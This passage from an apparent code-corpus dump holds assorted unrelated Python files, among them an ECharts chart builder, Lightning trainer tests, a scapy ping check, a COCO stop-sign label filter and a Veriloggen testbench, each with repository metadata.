        lo, hi = 0, len(chars) - 1
        while lo < hi:
            if chars[lo] not in VOWELS:
                lo += 1
            elif chars[hi] not in VOWELS:
                hi -= 1
            else:
                # both ends are vowels: swap and move both pointers inward
                chars[lo], chars[hi] = chars[hi], chars[lo]
                lo += 1
                hi -= 1
        return ''.join(chars)
sol = Solution()
print(sol.reverseVowels("leetcode"))
|
[
"[email protected]"
] | |
68dccaff016d11cce153e1b9db7affab3c07bd9b
|
01ea95d7301b9ad3b84f11c8cbcfe02d00017250
|
/bin/until/echarts/Line.py
|
74f27f3640b6945c26b0de1fc9a04cfdff387304
|
[] |
no_license
|
windyStreet/MQSTATIC
|
82962ae7a43d015dac61cb6ffce8d8853e6774df
|
b5a3d3862bd824b4a08b1c29436e417a9590dcab
|
refs/heads/master
| 2020-12-02T21:13:37.952192 | 2017-07-20T10:20:14 | 2017-07-20T10:20:14 | 96,275,208 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,518 |
py
|
#!/usr/bin/env python
# !-*- coding:utf-8 -*-
import datetime
from bin.until import Logger
from bin.until import Time
from bin.until import Mongo
from bin.until import DBCODE
from bin.until import Filter
from bin.logic import BO
from bin.until import Data
L = Logger.getInstance()
class Line(object):
    """Builds an ECharts line-chart option dict from Mongo statistics data."""
    # search_filter_infos = None, _step = 60, _step_count = 7, _title_text = "数据统计", _type = "line"
    def __init__(self, _search_filter_infos, _title_text, _type, _step=60, _step_count=7):
        # _search_filter_infos: {legend_name: {project_name, self_collection,
        #   filter_infos, statistic_type, statistic_name}} — assumed from the
        #   accesses in getLineChartData; TODO confirm with callers.
        self._search_filter_infos = _search_filter_infos
        self._step_count = _step_count
        self._step = _step
        self._title_text = _title_text
        self._type = _type
        self.start_time = None
        self.end_time = None
    def getFileter(self):
        # NOTE(review): unimplemented placeholder (name looks like a typo of "getFilter").
        pass
    def getLineChartData(self):
        """Assemble the ECharts option (title / legend / xAxis / series)."""
        series = []
        _legend_datas = []
        for key in self._search_filter_infos:
            _legend_data = key
            _legend_datas.append(_legend_data)
            _search_filter_info = self._search_filter_infos[key]
            _project = _search_filter_info['project_name']
            self_collection = _search_filter_info['self_collection']
            _filter_infos = _search_filter_info['filter_infos']
            _statistic_type = _search_filter_info['statistic_type']
            _statistic_name = _search_filter_info['statistic_name']
            self.start_time = Time.getStartTime(step=self._step, step_count=self._step_count)  # default start time
            is_search_db = False
            for _filter_info in _filter_infos:
                key = _filter_info['key']
                relation = _filter_info['relation']
                value = _filter_info['value']
                if key == 'time' and (relation == DBCODE.GT or relation == DBCODE.GTE):
                    self.start_time = value  # start time taken from the filter conditions
                elif key == 'time' and (relation == DBCODE.LTE or relation == DBCODE.LT):
                    self.end_time = value  # end time taken from the filter conditions
                else:
                    # any non-time filter forces a direct query on the raw collection
                    is_search_db = True
            times = Time.getComputeTimes(start_time=self.start_time, end_time=self.end_time, step=self._step)
            series_data = []  # values along the y axis
            if is_search_db is True:  # multi-condition query: count raw documents per interval
                _self_filter = Filter.getInstance()
                _self_filter.filter("project", _project, DBCODE.EQ)
                _self_filter.filter("type", _statistic_type, DBCODE.EQ)
                for _filter_info in _filter_infos:
                    if _filter_info['key'] != 'time':
                        _self_filter.filter(_filter_info['key'], _filter_info['value'], _filter_info['relation'])
                for i in range(len(times) - 1):
                    # one count per (times[i], times[i+1]] interval
                    _self_filter.filter("createtime", times[i], DBCODE.GT)
                    _self_filter.filter("createtime", times[i + 1], DBCODE.LTE)
                    _filter = _self_filter.filter_json()
                    count = self_collection.find(_filter).count()
                    series_data.append(count)
            else:
                # use the precomputed statistics collection instead
                res_collection = Mongo.getInstance(table=BO.BASE_statistic_res).getCollection()
                res_filter = Filter.getInstance()
                res_filter.filter("statistical_time", times[0], DBCODE.GT)
                res_filter.filter("statistical_time", times[-1], DBCODE.LTE)
                res_filter.filter("statistical_step", self._step, DBCODE.EQ)
                res_filter.filter("statistical_type", _statistic_type, DBCODE.EQ)
                res_filter.filter("statistical_project", _project, DBCODE.EQ)
                if Data.isNone(_statistic_name):
                    _statistic_name = None
                res_filter.filter("statistical_name", _statistic_name, DBCODE.EQ)
                print(res_filter.filter_json())
                ress = res_collection.find(res_filter.filter_json()).sort("statistical_time", -1)  # newest first
                self._step_count = len(times) - 1
                series_data = Data.getD4tArr(len=self._step_count, default_value=0)  # values on the axis
                # First try to assemble from precomputed rows; when the newest
                # interval has no row yet, backfill it from the raw collection.
                i = 0
                for res in ress:
                    if i == 0 and ress.count() != (len(times) - 1) and res['statistical_time'] != times[-1]:
                        # backfill the most recent interval with a direct count
                        _self_filter = Filter.getInstance()
                        if not Data.isNone(_statistic_name):
                            _self_filter.filter("name", _statistic_name, DBCODE.EQ)
                        _self_filter.filter("project", _project, DBCODE.EQ)
                        _self_filter.filter("type", _statistic_type, DBCODE.EQ)
                        _self_filter.filter("createtime", times[-2], DBCODE.GT)
                        _self_filter.filter("createtime", times[-1], DBCODE.LTE)
                        _filter = _self_filter.filter_json()
                        count = self_collection.find(_filter).count()
                        series_data[i] = count
                        series_data[i + 1] = res['statistical_count']
                        i = i + 2
                    else:
                        series_data[i] = res['statistical_count']
                        i = i + 1
                # rows were fetched newest-first; chart wants oldest-first
                series_data.reverse()
            xAxis_data = times[1:]  # x-axis labels: interval end times (leading point dropped)
            serie = {
                "name": _legend_data,
                "type": self._type,
                "showSymbol":False,
                "smooth":True,
                # "stack": 'total',
                "data": series_data.copy()  # values on the axis
            }
            series.append(serie)
        _result = {
            "title": {
                "text": self._title_text
            },
            "legend": {
                "data": _legend_datas.copy()
            },
            "xAxis": {
                "data": xAxis_data.copy()
            },
            "series": series
        }
        return _result
def getInsatnce(search_filter_infos=None, _title_text="数据统计", _type="line", _step=60, _step_count=7):
    """Factory for Line charts; returns None (with a warning) when no filters are given."""
    if search_filter_infos is not None:
        return Line(search_filter_infos, _title_text, _type, _step, _step_count)
    L.warn("init Line , not search_filter_infos par")
    return None
|
[
"[email protected]"
] | |
34f47be9ef55d3d72a7abc700bc1d17d771fd10e
|
f82e67dd5f496d9e6d42b4fad4fb92b6bfb7bf3e
|
/scripts/client/gui/scaleform/daapi/view/meta/serverstatsmeta.py
|
4a28fbbfafb863429e1181c69015f9b805026cc8
|
[] |
no_license
|
webiumsk/WOT0.10.0
|
4e4413ed4e7b00e22fb85d25fdae9400cbb4e76b
|
a84f536c73f86d9e8fab559e97f88f99f2ad7e95
|
refs/heads/master
| 2021-01-09T21:55:00.662437 | 2015-10-23T20:46:45 | 2015-10-23T20:46:45 | 44,835,654 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,339 |
py
|
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/ServerStatsMeta.py
from gui.Scaleform.framework.entities.BaseDAAPIComponent import BaseDAAPIComponent
class ServerStatsMeta(BaseDAAPIComponent):
    """DAAPI meta view: override stubs for Flash calls plus as_*S setters."""
    def getServers(self):
        # Stub — concrete subclass must override.
        self._printOverrideError('getServers')
    def relogin(self, id):
        # Stub — concrete subclass must override.
        self._printOverrideError('relogin')
    def isCSISUpdateOnRequest(self):
        # Stub — concrete subclass must override.
        self._printOverrideError('isCSISUpdateOnRequest')
    def startListenCsisUpdate(self, startListenCsis):
        # Stub — concrete subclass must override.
        self._printOverrideError('startListenCsisUpdate')
    def as_setPeripheryChangingS(self, isChanged):
        # as_*S methods forward data to the Flash object once DAAPI is up.
        if self._isDAAPIInited():
            return self.flashObject.as_setPeripheryChanging(isChanged)
    def as_setServersListS(self, servers):
        if self._isDAAPIInited():
            return self.flashObject.as_setServersList(servers)
    def as_disableRoamingDDS(self, disable):
        if self._isDAAPIInited():
            return self.flashObject.as_disableRoamingDD(disable)
    def as_setServerStatsS(self, stats, tooltipType):
        if self._isDAAPIInited():
            return self.flashObject.as_setServerStats(stats, tooltipType)
    def as_setServerStatsInfoS(self, tooltipFullData):
        if self._isDAAPIInited():
            return self.flashObject.as_setServerStatsInfo(tooltipFullData)
|
[
"[email protected]"
] | |
02a29652ff4002ff213de2e6753b4912bb85ea9e
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_392/ch4_2019_06_05_14_33_33_171155.py
|
cdcdf2b3d67996003e841afaca8af0a2d1c0ff25
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 158 |
py
|
def classifica_idade(x):
    """Classify an age: <=11 'crianca', 12..17 'adolescente', otherwise 'adulto'."""
    if x <= 11:
        return 'crianca'
    if 12 <= x <= 17:
        return 'adolescente'
    return 'adulto'
|
[
"[email protected]"
] | |
bfc18eaa66e8178ea1f6ceae0421145d57bb023a
|
8821970a489ea190ab7dd6a2da8f672681138543
|
/piston/web/__init__.py
|
acfc64d31c318a7da92d7c776160f900b4897930
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] |
permissive
|
grey580/piston
|
ab293d449728c9fbcc442adc0463135628548deb
|
5a3472517e2de14e75eb688cf9335b2c98c3e6f4
|
refs/heads/master
| 2021-01-09T05:35:52.587268 | 2017-02-02T09:37:50 | 2017-02-02T09:37:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,583 |
py
|
import re
from ..utils import strfdelta, strfage
from ..storage import configStorage as configStore
from .app import app, socketio
from ..steem import SteemConnector
from . import views, assets
import logging
log = logging.getLogger(__name__)
steem = SteemConnector().getSteem()
__ALL__ = [
"app",
"assets",
"forms",
"socketio",
"views",
]
@app.template_filter('age')
def _jinja2_filter_age(date, fmt=None):
    """Jinja2 filter: render a datetime as a human-readable age string."""
    return strfage(date, fmt)
@app.template_filter('excert')
def _jinja2_filter_datetime(data):
    """Jinja2 filter: excerpt a post by keeping its first 100 space-separated words."""
    return " ".join(data.split(" ")[:100])
@app.template_filter('parseBody')
def _jinja2_filter_parseBody(body):
    """Jinja2 filter: pre-process a post body before display.

    Lines that are bare image URLs (jpg/png/gif) are blanked out.
    """
    cleaned = re.sub(
        r"^(https?:.*/(.*\.(jpg|png|gif))\??.*)",
        r"\n\n",
        body, flags=re.MULTILINE)
    return cleaned
@app.template_filter('currency')
def _jinja2_filter_currency(value):
    """Jinja2 filter: format a token amount with thousands separators and 3 decimals.

    :param float value: The amount to format as string
    """
    formatted = "{:,.3f}".format(value)
    return formatted
def run(port, host):
    """ Run the Webserver/SocketIO and app

        :param port: TCP port to listen on
        :param host: interface/address to bind
    """
    socketio.run(app,
                 debug=configStore.get("web:debug"),
                 host=host,
                 port=port)
    # FIXME: Don't use .run()
    # from gevent.wsgi import WSGIServer
    # from yourapplication import app
    # http_server = WSGIServer(('', 5000), app)
    # http_server.serve_forever()
|
[
"[email protected]"
] | |
34d6d85b02c3b8d0e8734802762acb51523c3fa1
|
b56c584ba04de13c7a05f6633893b318eb3fb19d
|
/课后作业/第五天作业/guoqijun/Chapter 12/scapy_ping_one_new.py
|
a64b040c34aa4916e5a8141ec9405dfbff24807a
|
[] |
no_license
|
I318928/Python-Homework
|
42133f1291cc3da90293f994ae1a09dce618bdad
|
139b450f4bf2e4831688df80c12f43edcc00e468
|
refs/heads/master
| 2020-06-01T06:53:50.733061 | 2019-04-17T12:12:16 | 2019-04-17T12:12:16 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 429 |
py
|
#!/usr/bin/env python3
# -*- coding=utf-8 -*-
from scapy.all import *
def qytang_ping(ip):
    """Send one ICMP echo to ip; return (ip, 1) on a reply, (ip, 0) on timeout."""
    reply = sr1(IP(dst=ip) / ICMP(), timeout=1, verbose=False)
    return (ip, 1) if reply else (ip, 0)
if __name__ == '__main__':
    # Smoke test against a fixed lab host; '通!' = reachable, '不通!' = unreachable.
    result = qytang_ping('192.168.220.129')
    if result[1]:
        print(result[0], '通!')
    else:
        print(result[0], '不通!')
|
[
"[email protected]"
] | |
14b05dbce16975b542d6409149a24a4079334f70
|
3b4f985759e44dc169134ae7dcee8e92747c4b01
|
/tests/tests_app/components/multi_node/test_trainer.py
|
249d7868652bb9800f69f27af8365d32b7063452
|
[
"Apache-2.0"
] |
permissive
|
SkafteNicki/pytorch-lightning
|
4b09863bf222241ca7128d13df94ff60b71e50aa
|
7df627b43746a85aa87671bec3e6dada0d98b556
|
refs/heads/master
| 2023-07-15T21:20:02.468216 | 2023-05-04T08:12:33 | 2023-05-04T08:12:33 | 248,216,299 | 3 | 1 |
Apache-2.0
| 2023-07-10T02:40:24 | 2020-03-18T11:44:20 |
Python
|
UTF-8
|
Python
| false | false | 3,538 |
py
|
import os
from copy import deepcopy
from functools import partial
from unittest import mock
import pytest
from lightning_utilities.core.imports import module_available
from lightning_utilities.test.warning import no_warning_call
import pytorch_lightning as pl
from lightning.app.components.multi_node.trainer import _LightningTrainerRunExecutor
def dummy_callable(**kwargs):
    """Build a Trainer and hand back the kwargs recorded by the stubbed __init__."""
    trainer = pl.Trainer(**kwargs)
    return trainer._all_passed_kwargs
def dummy_init(self, **kwargs):
    """Stand-in for Trainer.__init__: just record the kwargs for later inspection."""
    self._all_passed_kwargs = kwargs
def _get_args_after_tracer_injection(**kwargs):
    """Run the executor with Trainer.__init__ stubbed out.

    Returns (trainer_kwargs, env_vars): the kwargs the executor ultimately
    passed to Trainer, and a snapshot of os.environ taken inside the patch
    (to inspect the distributed env vars the executor exports).
    """
    with mock.patch.object(pl.Trainer, "__init__", dummy_init):
        ret_val = _LightningTrainerRunExecutor.run(
            local_rank=0,
            work_run=partial(dummy_callable, **kwargs),
            main_address="1.2.3.4",
            main_port=5,
            node_rank=6,
            num_nodes=7,
            nprocs=8,
        )
        env_vars = deepcopy(os.environ)
    return ret_val, env_vars
def check_lightning_pytorch_and_mps():
    """True iff pytorch_lightning is importable and an MPS accelerator is available."""
    if not module_available("pytorch_lightning"):
        return False
    return pl.accelerators.MPSAccelerator.is_available()
@pytest.mark.skipif(not check_lightning_pytorch_and_mps(), reason="pytorch_lightning and mps are required")
@pytest.mark.parametrize("accelerator_given,accelerator_expected", [("cpu", "cpu"), ("auto", "cpu"), ("gpu", "cpu")])
def test_trainer_run_executor_mps_forced_cpu(accelerator_given, accelerator_expected):
    """On MPS machines every accelerator choice must be coerced to cpu."""
    warning_str = (
        r"Forcing accelerator=cpu as other accelerators \(specifically MPS\) are not supported "
        + "by PyTorch for distributed training on mps capable devices"
    )
    # Expect the warning exactly when the executor had to override the user's choice.
    if accelerator_expected != accelerator_given:
        warning_context = pytest.warns(UserWarning, match=warning_str)
    else:
        warning_context = no_warning_call(match=warning_str + "*")
    with warning_context:
        ret_val, env_vars = _get_args_after_tracer_injection(accelerator=accelerator_given)
        assert ret_val["accelerator"] == accelerator_expected
@pytest.mark.parametrize(
    "args_given,args_expected",
    [
        ({"devices": 1, "num_nodes": 1, "accelerator": "gpu"}, {"devices": 8, "num_nodes": 7, "accelerator": "auto"}),
        ({"strategy": "ddp_spawn"}, {"strategy": "ddp"}),
        ({"strategy": "ddp_sharded_spawn"}, {"strategy": "ddp_sharded"}),
    ],
)
@pytest.mark.skipif(not module_available("torch"), reason="PyTorch is not available")
def test_trainer_run_executor_arguments_choices(
    args_given: dict,
    args_expected: dict,
):
    """Executor rewrites device/strategy kwargs and exports the distributed env vars."""
    if pl.accelerators.MPSAccelerator.is_available():
        args_expected.pop("accelerator", None)  # Cross platform tests -> MPS is tested separately
    ret_val, env_vars = _get_args_after_tracer_injection(**args_given)
    for k, v in args_expected.items():
        assert ret_val[k] == v
    # Expected env follows the fixed run() args in _get_args_after_tracer_injection:
    # local_rank=0, main 1.2.3.4:5, node_rank=6, num_nodes=7, nprocs=8.
    assert env_vars["MASTER_ADDR"] == "1.2.3.4"
    assert env_vars["MASTER_PORT"] == "5"
    assert env_vars["GROUP_RANK"] == "6"
    assert env_vars["RANK"] == str(0 + 6 * 8)
    assert env_vars["LOCAL_RANK"] == "0"
    assert env_vars["WORLD_SIZE"] == str(7 * 8)
    assert env_vars["LOCAL_WORLD_SIZE"] == "8"
    assert env_vars["TORCHELASTIC_RUN_ID"] == "1"
@pytest.mark.skipif(not module_available("lightning"), reason="lightning not available")
def test_trainer_run_executor_invalid_strategy_instances():
    """Spawn-based DDP strategy instances are rejected with a ValueError."""
    with pytest.raises(ValueError, match="DDP Spawned strategies aren't supported yet."):
        _, _ = _get_args_after_tracer_injection(strategy=pl.strategies.DDPStrategy(start_method="spawn"))
|
[
"[email protected]"
] | |
7c0f8ef2e5e76dd512f4593f86eb29756a26e302
|
be6e1acc03149aee1ffbdaa315cf8b7d175fffe9
|
/event_log.py
|
6d347539f3034a82bf2d2298b62c74976e512faf
|
[
"MIT"
] |
permissive
|
rebcabin/cartpoleplusplus
|
763c22d41fc6f13b01a1519da3b51de91cfd03f7
|
f986f495755369f571dcbb9a79d21680b916c0f4
|
refs/heads/master
| 2020-04-05T08:27:28.420983 | 2018-11-24T01:17:47 | 2018-11-24T01:17:47 | 156,716,591 | 0 | 0 |
MIT
| 2018-11-08T14:10:29 | 2018-11-08T14:10:28 | null |
UTF-8
|
Python
| false | false | 6,521 |
py
|
#!/usr/bin/env python
import event_pb2
import gzip
import matplotlib.pyplot as plt
import numpy as np
import StringIO
import struct
def rgb_to_png(rgb):
  """convert RGB data from render to png"""
  # matplotlib encodes the array as PNG into an in-memory buffer (Python 2 StringIO)
  sio = StringIO.StringIO()
  plt.imsave(sio, rgb)
  return sio.getvalue()
def png_to_rgb(png_bytes):
  """convert png (from rgb_to_png) to RGB"""
  # note PNG is always RGBA so we need to slice off A
  rgba = plt.imread(StringIO.StringIO(png_bytes))
  return rgba[:,:,:3]
def read_state_from_event(event):
  """unpack state from event (i.e. inverse of add_state_to_event)"""
  if len(event.state[0].render) > 0:
    # raw-pixel episode: rebuild (height, width, 3, num_cameras, num_repeats)
    num_repeats = len(event.state)
    num_cameras = len(event.state[0].render)
    eg_render = event.state[0].render[0]
    state = np.empty((eg_render.height, eg_render.width, 3,
                      num_cameras, num_repeats))
    for r_idx in range(num_repeats):
      repeat = event.state[r_idx]
      for c_idx in range(num_cameras):
        png_bytes = repeat.render[c_idx].png_bytes
        state[:,:,:,c_idx,r_idx] = png_to_rgb(png_bytes)
  else:
    # pose episode: (num_repeats, 2, 7) with row 0 = cart pose, row 1 = pole pose
    state = np.empty((len(event.state), 2, 7))
    for i, s in enumerate(event.state):
      state[i][0] = s.cart_pose
      state[i][1] = s.pole_pose
  return state
class EventLog(object):
  """Appends Episode protos to a log file, one length-prefixed record each."""
  def __init__(self, path, use_raw_pixels):
    # use_raw_pixels: True -> states are per-camera renders,
    # False -> (repeats, 2, 7) pose arrays (see add_state_to_event).
    self.log_file = open(path, "ab")
    self.episode_entry = None
    self.use_raw_pixels = use_raw_pixels
  def reset(self):
    # Flush the finished episode (if any) to disk and start a fresh one.
    if self.episode_entry is not None:
      # *sigh* have to frame these ourselves :/
      # (a long as a header-len will do...)
      buff = self.episode_entry.SerializeToString()
      if len(buff) > 0:
        buff_len = struct.pack('=l', len(buff))
        self.log_file.write(buff_len)
        self.log_file.write(buff)
        self.log_file.flush()
    self.episode_entry = event_pb2.Episode()
  def add_state_to_event(self, state, event):
    """pack state into event"""
    if self.use_raw_pixels:
      # TODO: be nice to have pose info here too in the pixel case...
      num_repeats = state.shape[4]
      for r_idx in range(num_repeats):
        s = event.state.add()
        num_cameras = state.shape[3]
        for c_idx in range(num_cameras):
          render = s.render.add()
          render.width = state.shape[1]
          render.height = state.shape[0]
          render.png_bytes = rgb_to_png(state[:,:,:,c_idx,r_idx])
    else:
      # pose case: state[r][0] is the cart pose, state[r][1] the pole pose
      num_repeats = state.shape[0]
      for r in range(num_repeats):
        s = event.state.add()
        s.cart_pose.extend(map(float, state[r][0]))
        s.pole_pose.extend(map(float, state[r][1]))
  def add(self, state, action, reward):
    # Append one (state, action, reward) timestep to the current episode.
    event = self.episode_entry.event.add()
    self.add_state_to_event(state, event)
    if isinstance(action, int):
      event.action.append(action) # single action
    else:
      assert action.shape[0] == 1 # never log batch operations
      event.action.extend(map(float, action[0]))
    event.reward = reward
  def add_just_state(self, state):
    # Append a state-only event (no action / reward fields set).
    event = self.episode_entry.event.add()
    self.add_state_to_event(state, event)
class EventLogReader(object):
  """Reads length-prefixed Episode protos from a (possibly gzipped) log file."""
  def __init__(self, path):
    opener = gzip.open if path.endswith(".gz") else open
    self.log_file = opener(path, "rb")
  def entries(self):
    """Yield each Episode record until EOF."""
    episode = event_pb2.Episode()
    while True:
      header = self.log_file.read(4)
      if len(header) == 0: return
      (frame_len,) = struct.unpack('=l', header)
      episode.ParseFromString(self.log_file.read(frame_len))
      yield episode
def make_dir(d):
  """Create directory d (including parents) if it does not already exist."""
  # Fix: os is never imported at module level in this file (only inside the
  # __main__ block below), so this function raised NameError when called from
  # any other importer. A local import keeps the module's top level unchanged.
  import os
  if not os.path.exists(d):
    os.makedirs(d)
if __name__ == "__main__":
  # CLI (Python 2): dump episodes from a log and optionally render frames to PNGs.
  import argparse, os, sys, Image, ImageDraw
  parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
  parser.add_argument('--log-file', type=str, default=None)
  parser.add_argument('--echo', action='store_true', help="write event to stdout")
  parser.add_argument('--episodes', type=str, default=None,
                      help="if set only process these specific episodes (comma separated list)")
  parser.add_argument('--img-output-dir', type=str, default=None,
                      help="if set output all renders to this DIR/e_NUM/s_NUM.png")
  parser.add_argument('--img-debug-overlay', action='store_true',
                      help="if set overlay image with debug info")
  # TODO args for episode range
  opts = parser.parse_args()
  episode_whitelist = None
  if opts.episodes is not None:
    episode_whitelist = set(map(int, opts.episodes.split(",")))
  if opts.img_output_dir is not None:
    make_dir(opts.img_output_dir)
  total_num_read_episodes = 0
  total_num_read_events = 0
  elr = EventLogReader(opts.log_file)
  for episode_id, episode in enumerate(elr.entries()):
    if episode_whitelist is not None and episode_id not in episode_whitelist:
      continue
    if opts.echo:
      print "-----", episode_id
      print episode
    total_num_read_episodes += 1
    total_num_read_events += len(episode.event)
    if opts.img_output_dir is not None:
      # one directory per episode, one subdirectory per camera
      dir = "%s/ep_%05d" % (opts.img_output_dir, episode_id)
      make_dir(dir)
      make_dir(dir + "/c0")  # HACK: assume only max two cameras
      make_dir(dir + "/c1")
      for event_id, event in enumerate(episode.event):
        for state_id, state in enumerate(event.state):
          for camera_id, render in enumerate(state.render):
            assert camera_id in [0, 1], "fix hack above"
            # open RGB png in an image canvas
            img = Image.open(StringIO.StringIO(render.png_bytes))
            if opts.img_debug_overlay:
              canvas = ImageDraw.Draw(img)
              # draw episode and event number in top left
              canvas.text((0, 0), "%d %d" % (episode_id, event_id), fill="black")
              # draw simple fx/fy representation in bottom right...
              # a bounding box
              bx, by, bw = 40, 40, 10
              canvas.line((bx-bw,by-bw, bx+bw,by-bw, bx+bw,by+bw, bx-bw,by+bw, bx-bw,by-bw), fill="black")
              # then a simple fx/fy line
              fx, fy = event.action[0], event.action[1]
              canvas.line((bx,by, bx+(fx*bw), by+(fy*bw)), fill="black")
            # write it out
            img = img.resize((200, 200))
            filename = "%s/c%d/e%05d_r%d.png" % (dir, camera_id, event_id, state_id)
            img.save(filename)
  print >>sys.stderr, "read", total_num_read_episodes, "episodes for a total of", total_num_read_events, "events"
|
[
"[email protected]"
] | |
9c0f49814adb26d4b6bde24af40fb90845ccac80
|
d34da4a69ebef62d4b17b8b56f0eca72f0c021e4
|
/traffic_sign/subset_coco.py
|
4e117ea2e1cf5dff2b36cba086a24552a7c93498
|
[] |
no_license
|
gy20073/aws
|
91c193e18a15ab4d20acf9d58078bda791b39c38
|
1d73ce215026b1baa91a359628c26edeb59a22ce
|
refs/heads/master
| 2020-03-19T03:55:24.406320 | 2019-10-12T05:35:30 | 2019-10-12T05:35:30 | 135,775,172 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,296 |
py
|
import os
# for each label file, check whether stop sign in it.
# if do, then create new label file with only stop sign, in label dir, and add an entry of this image in the index file
subset="train2014"
label_path = "/scratch/yang/aws_data/coco/labels_bak/" + subset
out_path = "/scratch/yang/aws_data/coco/labels/" + subset
image_prefix = "/scratch/yang/aws_data/coco/images/" + subset
index_file = "/scratch/yang/aws_data/coco/filtered_" + subset + ".txt"
if not os.path.exists(out_path):
os.mkdir(out_path)
# 11 is stop sign
def filter_stop_sign(fname):
    """Return the label lines of class 11 (stop sign), remapped to class 0."""
    kept = []
    with open(fname, "r") as f:
        for line in f:
            if line.startswith("11 "):
                kept.append("0 " + line[3:])
    return kept
def write_label(oname, filtered):
    """Write the filtered label lines to oname (one file per image)."""
    with open(oname, "w") as f:
        f.writelines(filtered)
index = open(index_file, "w")
for file in os.listdir(label_path):
if file.endswith(".txt"):
filtered = filter_stop_sign(os.path.join(label_path, file))
if len(filtered) > 0:
# save the label
write_label(os.path.join(out_path, file), filtered)
# save the image name
index.write(os.path.join(image_prefix, file.replace(".txt", ".jpg")) + "\n")
index.close()
|
[
"[email protected]"
] | |
44b7e6b025a9917ce35e63a322c922264b4455b4
|
5922398212b6e113f416a54d37c2765d7d119bb0
|
/python/O(1) Check Power of 2.py
|
d664954d5d2b872362cab07d682b5469322e34d5
|
[] |
no_license
|
CrazyCoder4Carrot/lintcode
|
e777f73e1fdfe3b8abc9dbfc07d26602bf614151
|
33dcd7f0e2d9bee58840a3370837cb2db82de1eb
|
refs/heads/master
| 2021-01-09T20:38:59.813198 | 2017-01-16T22:34:26 | 2017-01-16T22:34:26 | 60,287,619 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 218 |
py
|
class Solution:
    """
    @param n: An integer
    @return: True or false
    """
    def checkPowerOf2(self, n):
        # O(1) bit trick: a positive power of two has exactly one set bit,
        # so n & (n - 1) clears it to zero. Zero itself is excluded.
        return n != 0 and (n & (n - 1)) == 0
|
[
"[email protected]"
] | |
1b90c28e59e5d4a5998f4d6c2027b2eacdd7467f
|
1d9356626550004745bbc14de9a3308753afcea5
|
/sample/tests/while/led.py
|
2d6f9c7e92fa414d08993efca62d0115951efe0e
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
hoangt/veriloggen
|
e916290aa15c63f03ec0ad8e9c8bdf183787fbe9
|
8e7bd1ff664a6d683c3b7b31084ff4d961c4c841
|
refs/heads/master
| 2021-01-14T12:01:03.686270 | 2015-09-18T06:49:20 | 2015-09-18T06:49:20 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 806 |
py
|
import sys
import os
from veriloggen import *
def mkTest():
    """Build a Veriloggen testbench: free-running clock, reset pulse, 1024-step counter."""
    m = Module('test')
    clk = m.Reg('CLK')
    rst = m.Reg('RST')
    count = m.Reg('count', width=32)
    # waveform dump of the three signals
    m.Initial(
        Systask('dumpfile', 'uut.vcd'),
        Systask('dumpvars', 0, clk, rst, count),
    )
    m.Initial(
        clk(0),
        Forever(clk(Not(clk), ldelay=5)) # forever #5 CLK = ~CLK;
    )
    # reset pulse, then count 0..1023 once per posedge CLK and finish
    m.Initial(
        rst(0),
        Delay(100),
        rst(1),
        Delay(100),
        rst(0),
        Delay(1000),
        count(0),
        While(count < 1024)(
            count( count + 1 ),
            Event(Posedge(clk))
        ),
        Systask('finish'),
    )
    return m
if __name__ == '__main__':
    # Build the testbench, write its Verilog to tmp.v and echo it to stdout.
    test = mkTest()
    verilog = test.to_verilog('tmp.v')
    print(verilog)
|
[
"[email protected]"
] | |
3233cf987d1529f760bef548e7a959952c37b30f
|
98e1155518b292341e60908d12233a2b130cb043
|
/helpers.py
|
cabba2a794108cc9b151778f12f403862f7ef99b
|
[] |
no_license
|
bkj/pbtnet
|
5443a580e1bca91e4c293ae2be8bdefb85a44ce0
|
e8c7b11be92e5ff9e4facccf908e87611b7f72bb
|
refs/heads/master
| 2021-05-02T13:49:50.894351 | 2018-02-08T03:48:25 | 2018-02-08T03:48:25 | 120,707,510 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 644 |
py
|
#!/usr/bin/env python
"""
helpers.py
"""
from __future__ import print_function, division
import numpy as np
import torch
from torch import nn
from torch.autograd import Variable
def to_numpy(x):
if isinstance(x, Variable):
return to_numpy(x.data)
return x.cpu().numpy() if x.is_cuda else x.numpy()
def set_seeds(seed):
    """Seed the numpy and torch (CPU and CUDA) RNGs from one base seed."""
    np.random.seed(seed)
    # fixed offsets keep the torch streams distinct from numpy's
    torch.manual_seed(seed + 123)
    torch.cuda.manual_seed(seed + 456)
class Flatten(nn.Module):
    """Collapse every dimension after the batch axis: (N, ...) -> (N, -1)."""
    def forward(self, x):
        batch_size = x.shape[0]
        return x.view(batch_size, -1)
def ablate(x, p):
    # Zero elements of x where a uniform sample exceeds... NOTE(review): the
    # mask keeps positions where rand > p, i.e. zeroes with probability p.
    # Mask shape (1, *x.shape[1:]) is shared across the batch dimension.
    # Requires CUDA (mask is built with .cuda()).
    return x * Variable(torch.rand((1,) + x.shape[1:]).cuda() > p).float()
|
[
"[email protected]"
] | |
ab4b58c9f57d81b86dab68de0f9e7f748fa7cce3
|
7680dbfce22b31835107403514f1489a8afcf3df
|
/Exercícios_parte_2/exercício__090.py
|
ee3ab125b849a111a10a421c0ee9807bb6c49dac
|
[] |
no_license
|
EstephanoBartenski/Aprendendo_Python
|
c0022d545af00c14e6778f6a80f666de31a7659e
|
69b4c2e07511a0bd91ac19df59aa9dafdf28fda3
|
refs/heads/master
